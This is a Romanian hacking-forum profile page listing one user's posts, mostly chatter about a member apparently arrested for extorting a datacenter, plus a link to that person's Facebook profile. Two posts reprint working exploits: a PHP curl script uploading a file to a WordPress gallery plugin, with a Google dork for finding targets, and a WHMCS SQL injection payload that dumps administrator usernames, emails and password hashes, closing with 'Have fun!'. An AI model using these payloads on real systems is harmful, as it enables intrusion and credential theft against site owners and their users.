Jump to content

Shelo

Active Members
  • Posts

    250
  • Joined

  • Last visited

Everything posted by Shelo

  1. Foarte frumos tutorialu dar am o intrebare Providerul de internet pe care il ai nu sesizeaza ca treci printr-un vpn adica autoritatile ar putea afla de la ce provider ai fost conectat?
  2. Shelo

    Hosting ?

    Eu ti-as recomanda hostway.ro , depinde ce vrei sa hostezi.
  3. Userul a luat ban , de ce mai faceti challange-ul ?
  4. Pai da ... ia cerut 5000 euro ca sa nu publice baza de date. De la el stiu povestea asta si ca azi se duce , de la apropiati de al lui cum ca ar fi fost arestat.
  5. Nu am vazut la televizor , dau cu presupusu. Byte am modificat dupa ce am sesizat gresala.
  6. Vazand de ieri pana astazi parerile voastre despre publicarea datelor lui Valium am vazut cum au demers lucrurile si find cu urechile ca doua atene am aflat ca acel baiat rau ar fi fost arestat astazi dupa un flagrant facut de directorul datacenterului Ad Net Telecom. Din informatiile pe care le detin la momentul actual el s-ar fi dus astazi sa ia suma de 5000 euro ceruta directorului companiei sub pretextul ca ii publica baza de date cu toti clientii. Site-ul oficial rsp (nu fac publicitate.) este inchis in momentul actual afisand urmatorul mesaj Voi ce credeti , a fost s-au nu arestat. Va multumesc !
  7. Eu unul am fost de la inceput PRO acestei decizii , stiam povestea RST-ului citind anunturi aici , dar m-am gandit putin alt fel , nu m-am gandit ca ar putea suferi din nou tot RST-ul , eu m-am gandit in felul urmator Daca acoperi 1 hot , incurajezi alti 10. Ca sa argumentez ce am spus pot da un exemplu . Multi de aici sunt pasionati de IT (Asta nu va face hackeri.) mereu am fost etichetati cu pseudonimul de hackeri. De ce? Pentru ca au fost asa zisii copii care dupa 2-3 tutoriale pe net si cu morcovul in cur spargeau site-uri cu vulnerabilitati luate de pe RST dupa care foloseau paginile pentru carding am fost pusi toti in aceiasi oala Pentru un baiat ca valium era cat pe ce sa fim din nou etichetati si toate degetele erau indreptate catre RST Ii inteleg si pe cei care au votat contra , doar ca sunt 2 categorii. 1) I-au pus Valium 2) Le-au fost mila de Valium si s-au gandt ca nu merita efortul. Dar nu s-au gandit ca persoane ca valium ne pune eticheta la toti. Eu cam atat am avut de zis Off: Valium asculta bine melodiile astea doua , si nu ne injura pe noi , tu ti-ai facuto cu mana ta (Un prieten iti arata unde ai gresit , nu te unge cu vorbe bune.)
  8. https://www.youtube.com/watch?v=seXuui5-GK8
  9. Ai rezolvat? sper ca aia de la Ad Net Telecom au folosit prezervative !
  10. Am cautat pe internet si am dat de profilul lui de facebook , pare cam satanist .. Dumnezeu vede totul. O las profilul de facebook si trageti voi concluziile. https://www.facebook.com/valium.dxmorphine.lsd
  11. Parerea mea ar fi ca daca ati face publice datele le-ar fi mai usor sa-si faca treaba. Eu am votat PRO si imi sustin parerea.
  12. Pe deoparte are dreptate , pe de alta parte nu are. Tin sa precizez ca viata nu este stricata de RST ci el si-a stricato singur. Nu RST-ul l-a pus sa "hakareasca" acel server ci el a facuto pe cont propriu. Tin sa precizez ca "Valium" se lauda in stanga si in dreapta ca a spart Ad Net Telecom asta este problema lui , Faptele rele vin cu un strop de consecinte. Dar se lauda ca ei si cu "echipa lui" RSP a picat RST-ul si tot il tineau in flood. Au vrut sa fie hackeri , acum suporta consecintele unor hackeri RST-ul nu a spus nimic sau nu a reactionat impotriva atacurilor lui catre RST , dar el a continuat , acum este randul lui sa stranga din dinti. Ps: In aceiasi oala se enumera si Team Cracker`s alti hackeri. Calitatile de hacker nu le demonstrezi spargand un server si santajand , il demonstrezi atunci esti om cu oamenii. Pace !
  13. Noi nu suntem prosti , noi suntem corecti ! Tu nu ai fost prost atunci cand ai santajat?! Gandeste-te de doua ori inainte sa acctionezi ! // EDIT: Forumul ia flood de la "echipa lui Valium" Incercati sa rezolvati asta.
  14. Eu tin sa precizez ca fiecare vulnerabiltate care am gasito a fost RAPORTATA Si nu am scos date confidentiale , nu am dat deface-uri , nu am urcat shelluri , eu fac totul din pasiune si crede-ma inca sunt mic penga multi de aici , am multe de invatat. Nu ma pune in aceiasi oala , cu ce esti tu mai presus decat mine ?! Eu nu sar sus si tare cu ce fac. Doar postez ce gasesc asta nu inseamna ca nu raportez.
  15. Nu merge linkul cica este picat site-ul
  16. good joob
  17. Prima parte a razboiului. a Doua parte a razboiului vom putea juca Counter Strike pe viu Iar a treia parte va veni salvatorul
  18. Eu nu doresc sa ma angajez undeca ca si programator PHP eu doresc sa fiu pentester , dupa cate stiu am nevoie de cunostinte php si sql pentru inceput ca sa inteleg fenomenele de asta m-am gandit sa fac acest topic.
  19. Da generezi Vizualizari atata timp cat ai o lista de proxyuri dar nu vad de ce ti-ai genera vizite false .. in fine ..
  20. ############################################################### # Exploit Title: Wordpress page-flip-image-gallery plugins Remote File Upload Vulnerability # Author: Ashiyane Digital Security Team # Date: 12/06/2013 # Vendor Homepage: http://pageflipgallery.com # Software Link : http://downloads.wordpress.org/plugin/page-flip-image-gallery.zip # Google dork: inurl:/wp-content/plugins/page-flip-image-gallery/ # Tested on: Windows/Linux ############################################################### 1)Exploit : = = = = = = <?php $uploadfile="file.php"; $ch = curl_init(" http://127.0.0.1/wp-content/plugins/page-flip-image-gallery/upload.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('orange_themes'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> http://[Target]/wp-content/uploads/file.php Sursa: Wordpress page-flip-image-gallery plugins Remote File Upload
  21. Vulnerable file: /includes/dbfunctions.php POC: select_query() function is vulnerable due to Register Globals Example: /whmcs/viewticket.php POST: tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins),0,0,0,0,0,0,0,0,0,0,0# Have fun! Sursa: WHMCS 5.2.8 - SQL Injection Vulnerability
  22. De m-as supara?
  23. De gasit am gasito si eu.
  24. Am gasit pe youtube niste documentare foarte interesanta , as dori sa le vedeti si voi si sa discutam putin pe subiectele acestea. Vizionare placuta.
×
×
  • Create New...